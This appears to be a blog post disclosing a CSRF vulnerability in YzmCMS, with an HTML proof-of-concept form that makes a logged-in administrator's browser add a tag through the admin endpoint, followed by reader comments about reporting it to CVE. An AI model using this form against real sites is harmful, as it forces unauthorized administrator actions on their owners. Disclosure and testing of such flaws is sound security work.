yzmcms_csrf漏洞_add_tag

There is two CSRF vulnerability that can add the Tag account

After the administrator logged in,open the following one page.

POC:

<html>  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOUR HOST/index.php/admin/tag/add.html" method="POST">
      <input type="hidden" name="tags" value="testtesttest" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 

For example:

2

Related Posts

Comments

  1. 小兄弟,你可以的,哈哈哈

    1. @yzmcms 造成困扰或者不便请谅解,没找到官方收漏洞的地方,只提交到了cve。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据